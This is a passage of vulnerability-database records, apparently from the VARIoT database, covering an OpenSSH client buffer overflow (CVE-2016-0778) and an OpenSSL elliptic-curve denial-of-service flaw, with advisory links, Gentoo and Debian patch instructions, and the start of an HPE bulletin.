        "id": "SSVID-90447",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-88288",
        "trust": 0.1
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135250",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135259",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136346",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135283",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135263",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "BID",
        "id": "80698"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "PACKETSTORM",
        "id": "135250"
      },
      {
        "db": "PACKETSTORM",
        "id": "135273"
      },
      {
        "db": "PACKETSTORM",
        "id": "135259"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "135283"
      },
      {
        "db": "PACKETSTORM",
        "id": "135263"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "id": "VAR-201601-0030",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:39:22.908000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
      },
      {
        "title": "HT206167",
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht206167"
      },
      {
        "title": "HT206167",
        "trust": 0.8,
        "url": "https://support.apple.com/ja-jp/ht206167"
      },
      {
        "title": "HPSBGN03638",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375"
      },
      {
        "title": "AXSA:2016-037:01",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/ja/node/6397"
      },
      {
        "title": "release-7.1p2",
        "trust": 0.8,
        "url": "http://www.openssh.com/txt/release-7.1p2"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - October 2015",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
      },
      {
        "title": "Oracle Linux Bulletin - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "title": "UTM Up2Date 9.354 released",
        "trust": 0.8,
        "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
      },
      {
        "title": "UTM Up2Date 9.319 released",
        "trust": 0.8,
        "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
      },
      {
        "title": "OpenSSH Remediation measures for denial of service vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59597"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/"
      },
      {
        "title": "Ubuntu Security Notice: openssh vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69"
      },
      {
        "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2016-638",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638"
      },
      {
        "title": "Red Hat: CVE-2016-0778",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0778"
      },
      {
        "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83"
      },
      {
        "title": "puppet-module-ssh",
        "trust": 0.1,
        "url": "https://github.com/ghoneycutt/puppet-module-ssh "
      },
      {
        "title": "fabric2",
        "trust": 0.1,
        "url": "https://github.com/winstonn/fabric2 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/cpcloudnl/ssh-config "
      },
      {
        "title": "Linux_command_crash_course",
        "trust": 0.1,
        "url": "https://github.com/akshayprasad/linux_command_crash_course "
      },
      {
        "title": "nmap",
        "trust": 0.1,
        "url": "https://github.com/project7io/nmap "
      },
      {
        "title": "DC-2-Vulnhub-Walkthrough",
        "trust": 0.1,
        "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough "
      },
      {
        "title": "DC-1-Vulnhub-Walkthrough",
        "trust": 0.1,
        "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough "
      },
      {
        "title": "satellite-host-cve",
        "trust": 0.1,
        "url": "https://github.com/redhatsatellite/satellite-host-cve "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.9,
        "url": "http://www.openssh.com/txt/release-7.1p2"
      },
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/80698"
      },
      {
        "trust": 2.4,
        "url": "http://www.debian.org/security/2016/dsa-3446"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html"
      },
      {
        "trust": 2.1,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
      },
      {
        "trust": 2.1,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "trust": 1.9,
        "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/201601-01"
      },
      {
        "trust": 1.9,
        "url": "http://www.ubuntu.com/usn/usn-2869-1"
      },
      {
        "trust": 1.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
      },
      {
        "trust": 1.8,
        "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
      },
      {
        "trust": 1.8,
        "url": "https://bto.bluecoat.com/security-advisory/sa109"
      },
      {
        "trust": 1.8,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680"
      },
      {
        "trust": 1.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/ht206167"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2016/jan/44"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1034671"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734"
      },
      {
        "trust": 1.6,
        "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733"
      },
      {
        "trust": 1.2,
        "url": "https://www.kb.cert.org/vuls/id/456088"
      },
      {
        "trust": 1.1,
        "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2869-1/"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/articles/2123781"
      },
      {
        "trust": 0.8,
        "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777"
      },
      {
        "trust": 0.8,
        "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/"
      },
      {
        "trust": 0.8,
        "url": "https://security-tracker.debian.org/tracker/cve-2016-0778"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu95595627/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu97668313"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0778"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777"
      },
      {
        "trust": 0.4,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.openssh.com"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044"
      },
      {
        "trust": 0.3,
        "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ghoneycutt/puppet-module-ssh"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.4"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssh/1:6.9p1-2ubuntu0.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.8"
      },
      {
        "trust": 0.1,
        "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506"
      },
      {
        "trust": 0.1,
        "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/14.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/244.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659"
      },
      {
        "trust": 0.1,
        "url": "https://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht206171"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0777"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0778"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0777"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0778"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "BID",
        "id": "80698"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "PACKETSTORM",
        "id": "135250"
      },
      {
        "db": "PACKETSTORM",
        "id": "135273"
      },
      {
        "db": "PACKETSTORM",
        "id": "135259"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "135283"
      },
      {
        "db": "PACKETSTORM",
        "id": "135263"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "BID",
        "id": "80698"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "PACKETSTORM",
        "id": "135250"
      },
      {
        "db": "PACKETSTORM",
        "id": "135273"
      },
      {
        "db": "PACKETSTORM",
        "id": "135259"
      },
      {
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "db": "PACKETSTORM",
        "id": "135283"
      },
      {
        "db": "PACKETSTORM",
        "id": "135263"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-14T00:00:00",
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "date": "2016-01-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "date": "2016-01-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "date": "2016-01-14T00:00:00",
        "db": "BID",
        "id": "80698"
      },
      {
        "date": "2016-01-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "date": "2016-01-14T17:27:54",
        "db": "PACKETSTORM",
        "id": "135250"
      },
      {
        "date": "2016-01-15T02:09:54",
        "db": "PACKETSTORM",
        "id": "135273"
      },
      {
        "date": "2016-01-15T00:03:14",
        "db": "PACKETSTORM",
        "id": "135259"
      },
      {
        "date": "2016-03-22T15:18:02",
        "db": "PACKETSTORM",
        "id": "136346"
      },
      {
        "date": "2016-01-18T04:26:08",
        "db": "PACKETSTORM",
        "id": "135283"
      },
      {
        "date": "2016-01-15T00:04:21",
        "db": "PACKETSTORM",
        "id": "135263"
      },
      {
        "date": "2016-01-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "date": "2016-01-14T22:59:02.280000",
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-01-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "date": "2022-12-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "date": "2022-12-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "date": "2017-01-23T03:06:00",
        "db": "BID",
        "id": "80698"
      },
      {
        "date": "2016-10-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "date": "2022-12-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "date": "2022-12-13T12:15:19.253000",
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      }
    ],
    "trust": 0.6
  }
}

VAR-201506-0231

Vulnerability from variot - Updated: 2024-07-23 20:32

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 dev-libs/openssl < 1.0.1o >= 0.9.8z_p7 >= 1.0.1o

Description

Multiple vulnerabilities have been found in OpenSSL. Please review the CVE identifiers referenced below for details.

Resolution

All OpenSSL 1.0.1 users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1o"

All OpenSSL 0.9.8 users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p7"

References

[ 1 ] CVE-2014-8176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-8176 [ 2 ] CVE-2015-1788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1788 [ 3 ] CVE-2015-1789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1789 [ 4 ] CVE-2015-1790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1790 [ 5 ] CVE-2015-1791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1791 [ 6 ] CVE-2015-1792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1792 [ 7 ] CVE-2015-4000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201506-02

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

. This could allow remote attackers to cause a denial of service (crash) or potentially execute arbitrary code. This could allow remote attackers to cause a denial of service. This could allow remote attackers to cause a denial of service (crash) via crafted ASN.1-encoded PKCS#7 blobs. This could allow remote attackers to cause a denial of service (crash). This could allow remote attackers to cause a denial of service.

For the oldstable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u17.

For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u1.

For the testing distribution (stretch), these problems have been fixed in version 1.0.2b-1.

For the unstable distribution (sid), these problems have been fixed in version 1.0.2b-1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c05184351

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05184351 Version: 1

HPSBHF03613 rev.1 - HPE Network Products including iMC, VCX, and Comware using OpenSSL, Remote Denial of Service (DoS), Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2016-07-05 Last Updated: 2016-07-05

Potential Security Impact: Remote Denial of Service (DoS), Unauthorized Access

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities in OpenSSL have been addressed with HPE network products including iMC, VCX, Comware 5 and Comware 7. The vulnerabilities could be exploited remotely resulting in Denial of Service (DoS) or unauthorized access.

Please refer to the RESOLUTION below for a list of impacted products.

BACKGROUND

